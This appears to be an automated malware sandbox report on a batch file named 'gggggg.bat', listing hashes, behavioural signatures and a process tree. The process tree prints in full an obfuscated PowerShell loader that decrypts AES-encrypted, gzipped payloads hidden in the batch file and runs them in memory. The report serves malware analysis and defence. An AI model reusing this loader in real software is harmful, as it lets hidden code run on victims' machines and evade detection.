Analysis
-
max time kernel
13s -
max time network
19s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
05-10-2024 01:48
Static task
static1
Behavioral task
behavioral1
Sample
gggggg.bat
Resource
win7-20240903-en
windows7-x64
4 signatures
150 seconds
Behavioral task
behavioral2
Sample
gggggg.bat
Resource
win10v2004-20240910-en
windows10-2004-x64
20 signatures
150 seconds
General
-
Target
gggggg.bat
-
Size
391KB
-
MD5
5c7ec05ae4018bd0095f10fbc6761b4b
-
SHA1
49a12b9925f7b75c4bd77ee22b6203f8b4a4cdda
-
SHA256
50892b23687a3e0dc70e5b574944f0919a86255f9c3582a51ed6321aa4d52aa1
-
SHA512
fd072452ce80163a9033f947af46cab5d552938ff3b6cc63b3a25b9b4a96156bbf19db91ec8452e367bd428d1e67751e6534b7b99ba138f68842f1c9b0c09ae2
-
SSDEEP
6144:K37DLJ2557pMYtSiPuf4fJLzTFGSNzYZ/S7q/3dHJ0AwjMAa2S6CJjlk8RWm:o925xpMGNP04fJzRb2Hp0AwjZS6CJiEr
Score
8/10
Malware Config
Signatures
-
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
pid Process 2416 powershell.exe -
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 2416 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 2416 powershell.exe -
Suspicious use of WriteProcessMemory 6 IoCs
description pid Process procid_target PID 2592 wrote to memory of 2956 2592 cmd.exe 30 PID 2592 wrote to memory of 2956 2592 cmd.exe 30 PID 2592 wrote to memory of 2956 2592 cmd.exe 30 PID 2592 wrote to memory of 2416 2592 cmd.exe 31 PID 2592 wrote to memory of 2416 2592 cmd.exe 31 PID 2592 wrote to memory of 2416 2592 cmd.exe 31
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\gggggg.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:2592 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('e7bFgot9AWejqc2o/AjvIuQR7z2l9SN0/zfrjvTH8Gg='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('7J2xrxvx4aeHa3vOPxv6zQ=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $vqeCT=New-Object System.IO.MemoryStream(,$param_var); $vtNSz=New-Object System.IO.MemoryStream; $IPicr=New-Object System.IO.Compression.GZipStream($vqeCT, [IO.Compression.CompressionMode]::Decompress); $IPicr.CopyTo($vtNSz); $IPicr.Dispose(); $vqeCT.Dispose(); $vtNSz.Dispose(); $vtNSz.ToArray();}function execute_function($param_var,$param2_var){ $SaZVK=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $DYzmT=$SaZVK.EntryPoint; $DYzmT.Invoke($null, $param2_var);}$DBjjA = 'C:\Users\Admin\AppData\Local\Temp\gggggg.bat';$host.UI.RawUI.WindowTitle = $DBjjA;$OAwuK=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($DBjjA).Split([Environment]::NewLine);foreach ($ZZhHK in $OAwuK) { if ($ZZhHK.StartsWith('YrLNdKUEXZIyXuuRtFQc')) { $fRoIG=$ZZhHK.Substring(20); break; }}$payloads_var=[string[]]$fRoIG.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "2⤵PID:2956
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2416
-